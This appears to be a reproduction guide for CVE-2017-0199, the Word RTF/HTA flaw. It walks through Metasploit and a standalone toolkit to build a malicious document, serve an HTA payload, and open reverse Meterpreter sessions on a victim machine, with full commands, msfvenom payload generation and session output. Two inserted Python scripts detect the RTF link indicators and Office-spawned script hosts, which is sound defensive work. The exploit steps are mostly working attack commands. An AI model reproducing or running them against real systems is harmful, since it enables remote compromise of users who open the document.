CVE-2017-0199 Reproduction

0x01 Via Metasploit

Reference links

Preparation

Update MSF to the latest version.

Download the corresponding exploit module

cd /usr/share/metasploit-framework/modules/exploits/windows/fileformat
wget https://raw.githubusercontent.com/nixawk/metasploit-framework/feature/CVE-2017-0199/modules/exploits/windows/fileformat/office_word_hta.rb

Download the RTF template file

cd /usr/share/metasploit-framework/data/exploits
wget https://raw.githubusercontent.com/nixawk/metasploit-framework/feature/CVE-2017-0199/data/exploits/cve-2017-0199.rtf

Start the HTA server

msf > use exploit/windows/misc/hta_server 
msf exploit(hta_server) > show options 

Module options (exploit/windows/misc/hta_server):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Negotiate SSL for incoming connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)


Exploit target:

   Id  Name
   --  ----
   0   Powershell x86


msf exploit(hta_server) > run
[*] Exploit running as background job.

[*] Started reverse TCP handler on 10.14.81.6:4444 
[*] Using URL: http://0.0.0.0:8080/5Fzi0vL.hta
[*] Local IP: http://10.14.81.6:8080/5Fzi0vL.hta
msf exploit(hta_server) > [*] Server started.
msf exploit(hta_server) >

Generate the payload

msf exploit(hta_server) > use exploit/windows/fileformat/office_word_hta 
msf exploit(office_word_hta) > show options 

Module options (exploit/windows/fileformat/office_word_hta):

   Name       Current Setting              Required  Description
   ----       ---------------              --------  -----------
   FILENAME                                no        The file name.
   TARGETURI  http://example.com/test.rtf  yes       The path to a online hta file.


Exploit target:

   Id  Name
   --  ----
   0   Microsoft Office Word


msf exploit(office_word_hta) > set TARGETURI http://10.14.81.6:8080/5Fzi0vL.hta
TARGETURI => http://10.14.81.6:8080/5Fzi0vL.hta
msf exploit(office_word_hta) > set FILENAME msf.doc
FILENAME => msf.doc
msf exploit(office_word_hta) > run

[+] msf.doc stored at /root/.msf4/local/msf.doc
msf exploit(office_word_hta) >

Copy the generated msf.doc to the Windows machine; opening it yields a session.


msf exploit(office_word_hta) > 
[*] 10.14.89.247     hta_server - Delivering Payload
[*] 10.14.89.247     hta_server - Delivering Payload
[*] Sending stage (957487 bytes) to 10.14.89.247
[*] Meterpreter session 1 opened (10.14.81.6:4444 -> 10.14.89.247:10576) at 2017-04-19 21:58:03 +0800

msf exploit(office_word_hta) > sessions -i

Active sessions
===============

  Id  Type                     Information       Connection
  --  ----                     -----------       ----------
  1   meterpreter x86/windows  hp-PC\hp @ HP-PC  10.14.81.6:4444 -> 10.14.89.247:10576 (10.14.89.247)

msf exploit(office_word_hta) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : HP-PC
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x64
System Language : zh_CN
Domain          : WORKGROUP
Logged On Users : 4
Meterpreter     : x86/windows
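The document generated above works because the RTF carries a linked (not embedded) OLE object that Word is told to refresh when the file is opened, so the link target (here the HTA served by hta_server) is fetched and executed without further interaction. The following static check is an added example, not code from the original post or from the Metasploit module; it scans an RTF for the two control words that express that auto-updating link (\objautlink and \objupdate) and extracts any URL found in the hex-encoded \objdata stream, where the URL moniker stores the target as UTF-16LE. The sample document it builds is a constructed fixture with a placeholder address, not a real exploit file.

```python
"""Static check for the RTF indicators of a CVE-2017-0199 style document.
Added example; not from the original post or the Metasploit module."""
import re

# Control words that together mark an OLE *link* object Word refreshes on
# open (\objautlink = linked object, \objupdate = update when opened).
LINK_WORDS = ("objautlink", "objupdate")

# URL inside an OLE stream: UTF-16LE (URL moniker form) or plain ASCII.
UTF16_URL = re.compile(rb"h\x00t\x00t\x00p\x00(?:s\x00)?:\x00/\x00/\x00(?:[\x21-\x7e]\x00)+")
ASCII_URL = re.compile(rb"https?://[\x21-\x7e]+")


def find_indicators(rtf: bytes) -> dict:
    """Return the link control words present, any URLs found in \\objdata
    blobs, and a verdict that is True for the auto-link/auto-update pattern."""
    text = rtf.decode("latin-1")            # RTF is 7-bit; latin-1 never fails
    words = set(re.findall(r"\\([a-z]+)", text))
    link_words = [w for w in LINK_WORDS if w in words]

    urls = []
    for blob in re.findall(r"\\objdata\s*([0-9a-fA-F\s]+)", text):
        hexstr = re.sub(r"\s", "", blob)
        if len(hexstr) % 2:                 # truncated blob: drop the odd nibble
            hexstr = hexstr[:-1]
        raw = bytes.fromhex(hexstr)
        urls += [m.decode("utf-16-le") for m in UTF16_URL.findall(raw)]
        urls += [m.decode("ascii") for m in ASCII_URL.findall(raw)]

    return {
        "link_words": link_words,
        "urls": sorted(set(urls)),
        # Both control words, or a linked object whose stream carries a URL,
        # is the combination worth alerting on.
        "suspicious": len(link_words) == 2
        or ("objautlink" in link_words and bool(urls)),
    }


def build_sample(url: str) -> bytes:
    """Constructed fixture (not a real exploit document): a minimal RTF with a
    linked, auto-updating OLE object whose data stream holds `url` as
    UTF-16LE. The leading zero bytes are filler, not a real OLE header."""
    stream = b"\x00" * 8 + url.encode("utf-16-le") + b"\x00\x00"
    return (b"{\\rtf1{\\object\\objautlink\\objupdate{\\*\\objdata "
            + stream.hex().encode("ascii") + b"}}}")


if __name__ == "__main__":
    # Placeholder address; not an indicator from the original post.
    print(find_indicators(build_sample("http://attacker.example:8080/x.hta")))
    print(find_indicators(b"{\\rtf1{\\object\\objemb{\\*\\objdata 0102}}}"))
```

The verdict deliberately requires the link to be auto-updating (or to carry a URL), since an embedded object (\objemb) with no link target is ordinary content; a production rule would also account for control words split by comments or line breaks, which this example does not handle.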

0x02 Via the Toolkit

Preparation

Download the Toolkit

Generate the payload

python cve-2017-0199_toolkit.py -M gen -w <filename.rtf> -u <http://attacker.com/test.hta>

Generate the meterpreter payload

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.1 LPORT=4444 -f exe > /tmp/shell.exe
msfconsole -x "use multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.56.1; run"

Start the HTA server

python cve-2017-0199_toolkit.py -M exp -e <http://attacker.com/shell.exe> -l </tmp/shell.exe>

The victim receives a shell after opening the document.


[*] Started reverse TCP handler on 10.14.81.6:4444 
[*] Starting the payload handler...
[*] Sending stage (957487 bytes) to 10.14.89.247
[*] Meterpreter session 1 opened (10.14.81.6:4444 -> 10.14.89.247:12775) at 2017-04-19 23:09:03 +0800

meterpreter > sysinfo
Computer        : HP-PC
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x64
System Language : zh_CN
Domain          : WORKGROUP
Logged On Users : 4
Meterpreter     : x86/windows
meterpreter > screenshot 
[-] stdapi_ui_desktop_screenshot: Operation failed: Access is denied.
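On the endpoint, both variants above produce the same process lineage: Word fetches the linked .hta, Windows hands it to mshta.exe (the HTA host), and the HTA body (PowerShell, per the "Powershell x86" target of hta_server) runs under it. The check below is an added example, not code from the original post or the toolkit; it walks process-creation events upward from each script host and flags any whose ancestry reaches an Office application, so it also catches the grandchild case (powershell.exe under mshta.exe under WINWORD.EXE). The events are constructed in a simple key=value form, not a real Sysmon or 4688 export, and the PIDs and paths are made up.

```python
"""Process-lineage check for script hosts descended from Office.
Added example; not from the original post or the CVE-2017-0199 toolkit."""

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe"}
SCRIPT_HOSTS = {"mshta.exe", "powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe"}
MAX_DEPTH = 4   # how many parents to walk before giving up

# Constructed process-creation events (pid/ppid/image values are made up).
SAMPLE_LOG = r"""
pid=4012|ppid=1200|image=C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
pid=4120|ppid=4012|image=C:\Windows\SysWOW64\mshta.exe
pid=4188|ppid=4120|image=C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
pid=4300|ppid=1200|image=C:\Windows\System32\notepad.exe
pid=4400|ppid=1200|image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"""


def parse_event(line: str) -> dict:
    """'k=v|k=v' -> dict; values may contain spaces but not '|'."""
    return dict(field.partition("=")[::2] for field in line.strip().split("|"))


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def office_descendants(log: str) -> list:
    """Return (pid, chain) for every script host whose ancestry, within
    MAX_DEPTH parents, reaches an Office application. The chain reads
    child <- parent <- ... <- office app."""
    events = [parse_event(l) for l in log.splitlines() if l.strip()]
    by_pid = {e["pid"]: e for e in events}
    hits = []
    for ev in events:
        if basename(ev["image"]) not in SCRIPT_HOSTS:
            continue
        chain = [basename(ev["image"])]
        parent = by_pid.get(ev["ppid"])       # None once we leave the log
        while parent is not None and len(chain) <= MAX_DEPTH:
            chain.append(basename(parent["image"]))
            if chain[-1] in OFFICE_APPS:
                hits.append((ev["pid"], " <- ".join(chain)))
                break
            parent = by_pid.get(parent["ppid"])
    return hits


if __name__ == "__main__":
    for pid, chain in office_descendants(SAMPLE_LOG):
        print(f"pid {pid}: {chain}")
```

The PowerShell started directly from explorer.exe (pid 4400) is not flagged, which is the point of walking ancestry rather than matching image names alone: the signal is the Office parent, not the script host itself.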